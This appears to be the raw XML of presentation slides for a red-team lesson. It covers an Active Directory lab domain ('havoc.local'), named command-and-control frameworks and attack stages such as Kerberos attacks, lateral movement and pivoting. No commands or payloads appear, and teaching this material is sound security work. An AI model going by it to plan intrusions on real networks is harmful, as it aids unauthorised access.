              <a:cxnSpLocks/>
              <a:stCxn id="43" idx="2"/>
              <a:endCxn id="33" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6153294" y="1872512"/>
              <a:ext cx="94930" cy="82179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248A2C-146C-4D1F-3BE2-0D6BFC090029}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="43" idx="2"/>
              <a:endCxn id="32" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6153294" y="1872512"/>
              <a:ext cx="3041524" cy="26226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392F02-8D37-CAC6-7917-65998F7C2FA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="34" idx="2"/>
              <a:endCxn id="30" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2958250" y="3900459"/>
              <a:ext cx="1578650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A84BA1E-77A4-7B78-F293-6B1C05CD1B64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="34" idx="2"/>
              <a:endCxn id="29" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4523151" y="3900459"/>
              <a:ext cx="13749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40CCC1E-2D3A-9860-D7D7-61DAE2EE1304}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="34" idx="2"/>
              <a:endCxn id="31" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4536900" y="3900459"/>
              <a:ext cx="1805417" cy="5946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107052-9BEF-EBC8-C622-6636F189C238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="1"/>
            <a:endCxn id="44" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4086634" y="2229791"/>
            <a:ext cx="3843853" cy="69492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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5345516-6A9E-C4CB-7A10-4BD7549E5323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846851" y="-42607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TREE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4A37442D-3529-A863-20F0-15B751F3BA1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1032674" y="1721329"/>
            <a:ext cx="4997986" cy="54459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child.havoc.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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54" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6099EF0-BA4F-2905-F86E-5CD40CD3B229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045749" y="5109550"/>
            <a:ext cx="4997986" cy="54459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havoc.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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40279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1B97A9-D0C4-6DA5-2BF3-2D5A7D100EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790825" y="1939844"/>
            <a:ext cx="6610350" cy="4381683"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 17828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14948FE7-3474-5F80-9516-48FDEF365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6537" y="5052353"/>
            <a:ext cx="826485" cy="990136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0DC2D319-41EC-5138-AF82-765550B8E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5190" y="5052353"/>
            <a:ext cx="826485" cy="990136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E9163668-F866-993E-FA55-F891789F7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8707" y="5052353"/>
            <a:ext cx="826485" cy="990136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FAD3B044-7353-9E76-F5C9-24A07DA7C9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5101" y="5052353"/>
            <a:ext cx="826485" cy="990136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AC43968E-B87B-F6EC-FB05-327EBEC24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5492" y="3602931"/>
            <a:ext cx="826485" cy="990136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4D8908F2-017A-97A6-E895-756EF3303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05774" y="3583574"/>
            <a:ext cx="826485" cy="99013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DE6E3DF-D019-7333-2AE6-A8BDDB5DF9A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5311561" y="2066980"/>
            <a:ext cx="1716989" cy="1087418"/>
            <a:chOff x="5076713" y="972294"/>
            <a:chExt cx="1899629" cy="1137002"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Graphic 21" descr="Database with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C1B3CC9-22AB-1C13-6F3E-651DE056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6713" y="118553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Database with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F94648CD-8D00-CDCF-FAE9-780912E49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80209" y="972294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Database with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{505571F7-1CF6-DD21-C8A2-B79EA0F8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61942" y="1194896"/>
              <a:ext cx="914400" cy="914400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AABFFE-C8DE-69EF-62FF-C01F2D1A1FA8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 flipH="1">
            <a:off x="5119016" y="2941501"/>
            <a:ext cx="1060875" cy="64207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27DB74-C8EC-97A5-3522-77EE54457A5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>
            <a:off x="6179891" y="2941501"/>
            <a:ext cx="88843" cy="6614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EA9F60-947D-CBB7-091C-920A64B4A675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>
            <a:off x="6179891" y="2941501"/>
            <a:ext cx="2068453" cy="211085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5E8D66E-7C08-7A20-D71E-D779DB52C6B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="2"/>
            <a:endCxn id="13" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4058432" y="4573710"/>
            <a:ext cx="1060584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C02DA9-19F7-069F-65AB-E2811D256734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 flipH="1">
            <a:off x="5109779" y="4573710"/>
            <a:ext cx="9237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CECC5C-A002-ACA8-E9A3-767EE0639FF1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>
            <a:off x="5119016" y="4573710"/>
            <a:ext cx="1212933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bject 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{245AD837-0C74-FF38-8134-A2D7D643C1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2048656" y="-66393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DOMAIN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73" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726D4D6C-EA5F-AD35-E5B6-0A611A2CBA1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1973584" y="1349003"/>
            <a:ext cx="8244832" cy="54459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8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child.havoc.local</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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46385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D2FA87CE-5E11-FC93-18B3-F3F930E14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8702" y="4709453"/>
            <a:ext cx="826485" cy="990136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1977D8AB-F1E5-FABC-89D6-6DAF48C3F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743" y="4709453"/>
            <a:ext cx="826485" cy="990136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8743E6D3-55F7-52A4-E41F-2D11998E7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3432" y="4709453"/>
            <a:ext cx="826485" cy="990136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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E944D8CC-EF04-6A9C-32E7-E54B7C75A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9678" y="4597255"/>
            <a:ext cx="826485" cy="990136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56D04BB3-177D-4B5D-28C7-A6E237968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0217" y="3260031"/>
            <a:ext cx="826485" cy="990136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A20F26AA-AD8E-2B2C-0271-76C955432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9184" y="3240674"/>
            <a:ext cx="826485" cy="99013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7519FE5-4718-6104-BCFB-FAC33528F31D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5016286" y="1724079"/>
            <a:ext cx="1716989" cy="1087417"/>
            <a:chOff x="5076713" y="972294"/>
            <a:chExt cx="1899629" cy="1137002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4F0DB124-CCF8-B0A8-C27C-B5A11638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76713" y="1185536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Database with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24AF1394-D5B8-5ECA-4521-CF194E7EA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80209" y="972294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Database with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8267AE62-7B50-86CE-D813-811A540ED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61942" y="1194896"/>
              <a:ext cx="914400" cy="914400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A6B1CF-E7F2-B3EB-F935-E3E37EA530AB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4162427" y="2598602"/>
            <a:ext cx="1722189" cy="6420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11EFB1-1A32-5120-DACA-5C4B30B2F3A1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>
            <a:off x="5884616" y="2598601"/>
            <a:ext cx="88843" cy="6614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36DC7F-B297-4DBB-4AC1-D72555DE8214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5884616" y="2598602"/>
            <a:ext cx="2778305" cy="199865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537E0E-69F0-05AB-16F1-91AE29761763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flipH="1">
            <a:off x="2210986" y="4230810"/>
            <a:ext cx="1951441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30AEDF-E405-B7A6-B2FC-AAA73B19B447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3361945" y="4230810"/>
            <a:ext cx="800482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A0B831-B459-14A7-CA2A-5414C9A1C559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4162427" y="4230810"/>
            <a:ext cx="1874248" cy="4786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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D63B48-FC73-AC01-FF1E-D06D5DB4CE8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1973584" y="-70849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Users and Computers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3D1EBC61-4161-B8A3-C85C-D672F382BD4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6752945" y="1890639"/>
            <a:ext cx="1076606" cy="66770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887"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="36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DC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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30083A69-246F-5C99-FB5C-B559F76BE99F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033802" y="5351526"/>
            <a:ext cx="2184614" cy="483039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887"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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SERVER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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15D9FA7B-B95B-DB8B-D76B-F5F605A4B5F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844379" y="5351526"/>
            <a:ext cx="2347514" cy="483039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887"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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WORKSTATION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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D0939C2D-49EC-E3DF-972A-7F16C120F08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922243" y="3895600"/>
            <a:ext cx="2347514" cy="483039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887"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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WORKSTATION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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AC1169E2-8F70-E590-0658-36FAED501475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1549799" y="5490445"/>
            <a:ext cx="2612627" cy="483039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887"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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DOMAIN USERS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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0152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9CBD4D1-7348-58B0-59B8-0F3FD421F75B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59DBAF40-A343-3302-7DDD-C0590F34F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Command &amp; Control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4D4714C-4BB1-940C-F1EB-12F3A6F932C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1109359" y="1231039"/>
            <a:ext cx="7918598" cy="3904915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Adversary Simulation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Emulate a quiet long-term embedded actor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Change network indicators to look like different adversary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Post-Exploitation Framework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Maintain persistence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Pivot and move laterally</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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8" name="Picture 4" descr="Joe's Transition - Cobalt Strike Research and Development">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90BFD4ED-C9C5-DD78-DC68-19DAAE1F9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832" y="1073228"/>
            <a:ext cx="748156" cy="7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00ACD9A-6FDC-A5C8-6A2C-D4E5EAE5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194" y="2422276"/>
            <a:ext cx="748156" cy="7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ryHackMe | Metasploit">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D71DC20-3A93-99C4-268B-939AC3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08689" y="1043916"/>
            <a:ext cx="887650" cy="8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rute Ratel C4 Archives - RedPacket Security">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6285BDEF-4DC4-2ABE-DAB8-DBB9F2E89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832" y="2459068"/>
            <a:ext cx="711364" cy="7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itHub - cobbr/Covenant: Covenant is a collaborative .NET C2 framework for  red teamers.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AFEC223-697B-A158-0E0B-8F0C14AB4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761" y="4923723"/>
            <a:ext cx="1381793" cy="40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ryHackMe | Empire">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{214EC3D1-8855-154B-E278-C3758A0E7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85" y="3684857"/>
            <a:ext cx="788347" cy="78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656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4EDD740-166B-E0BD-D6B2-2F64314B8FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961786" y="-13039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OUR AD NETWORK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5B2CDD25-AA51-CA00-A568-B4FA21657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1647" y="4905303"/>
            <a:ext cx="1055366" cy="1055366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Graphic 14" descr="Upload with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D90B4CCC-90DD-91D6-3A67-BEB8C2922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1647" y="3080397"/>
            <a:ext cx="1055366" cy="1055366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16" descr="Building Brick Wall with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33DA1EF3-23EC-D467-0A93-229B3847D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3797" y="1991623"/>
            <a:ext cx="1037035" cy="1037035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B2BB3063-5655-437E-DFD9-7CABDE962D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7035" y="1659428"/>
            <a:ext cx="1430800" cy="1409237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FCE96AC2-C3BB-A716-8AA3-1E43B177F4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07655" y="2581729"/>
            <a:ext cx="1430800" cy="140923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CCE442F-C195-7F95-DC04-2854A1677B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7044819" y="4896930"/>
            <a:ext cx="1716989" cy="1087417"/>
            <a:chOff x="5076713" y="972294"/>
            <a:chExt cx="1899629" cy="1137002"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="38" name="Graphic 37" descr="Database with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF80B72C-E180-2BF4-51A8-9D5527B20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76713" y="1185536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Database with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F352805-D986-34E9-123E-46C9305CC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580209" y="972294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Database with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2CC93DB-8D5F-BD32-5473-8AEFA8F04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061942" y="1194896"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5E18F9-682D-A68B-4EFB-7543B7BD3373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422228" y="5873603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attacker (HAVOC)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A936AD11-CB2A-F6F4-20BB-BF4EB39ED34C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422228" y="3790718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cloud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DA792DDF-E7EC-6C48-0B2B-B5832518E251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439898" y="2774383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firewall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4" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C2BCB6E-3576-166B-81F7-248707149CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5648847" y="2744121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WORKSTATION-01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5" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F6F26E-A7DC-14CD-3009-242AF9A9B362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7855953" y="3629742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WORKSTATION-02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46" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF4D710-5108-8CCE-C592-F3D94EDEEF47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6268221" y="5849284"/>
            <a:ext cx="3334204" cy="42148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2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DC01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Tenorite" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Trebuchet M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DBCCBE-5C0D-BA77-B79A-ED8A53E2A02D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="0"/>
            <a:endCxn id="42" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2089330" y="4212201"/>
            <a:ext cx="0" cy="69310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5A60A04-74C7-E93F-998B-5D73795F2FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="0"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2089330" y="2510141"/>
            <a:ext cx="1544467" cy="57025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4D98071-C781-BC5E-FF2A-93B068493F5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670832" y="2364046"/>
            <a:ext cx="1970606" cy="14609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C335CC7-CCF1-5108-22A4-F6B9F820262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077835" y="2364047"/>
            <a:ext cx="1111933" cy="49663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060895B-5CC2-CC4F-8A4D-13C8091E989B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7315949" y="3212164"/>
            <a:ext cx="597200" cy="16847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237795E-AE41-3769-6B18-9080578FC35D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="45" idx="2"/>
            <a:endCxn id="39" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7913149" y="4051225"/>
            <a:ext cx="1609906" cy="8457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D187925D-66C0-4034-0896-C4489A2C6A0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5782765" y="1590676"/>
            <a:ext cx="5005376" cy="4730852"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 17828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7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D542AB1-83F9-40EC-4349-2EC738C277CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880657" y="-21601"/>
            <a:ext cx="8244832" cy="1037036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60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STAGES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="60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8D8CDB3-CD46-869C-874C-F6F8E966D366}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935110" y="1489229"/>
            <a:ext cx="8656316" cy="3960914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467" marR="3387" indent="-1143000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="887"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Initial Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1151467" marR="3387" indent="-1143000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="887"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1151467" marR="3387" indent="-1143000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="887"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Kerberos Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1151467" marR="3387" indent="-1143000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="887"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Lateral Movement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1151467" marR="3387" indent="-1143000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="887"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Pivoting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Tenorite" panose="000005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4451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84A2DF7-7CC8-91FE-D538-43E3729DD0DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1942608" y="-81370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1. Initial Access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3FD16-F990-0530-F3C1-70F5A85BE1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250"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1374923" y="963929"/>
            <a:ext cx="9380201" cy="5577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379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7605032-5B1A-D85D-DB29-6AF9B90144FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1973584" y="-33644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2. Privilege Escalation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A8334A-6996-048A-DE15-3646FBAB1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172" y="1087059"/>
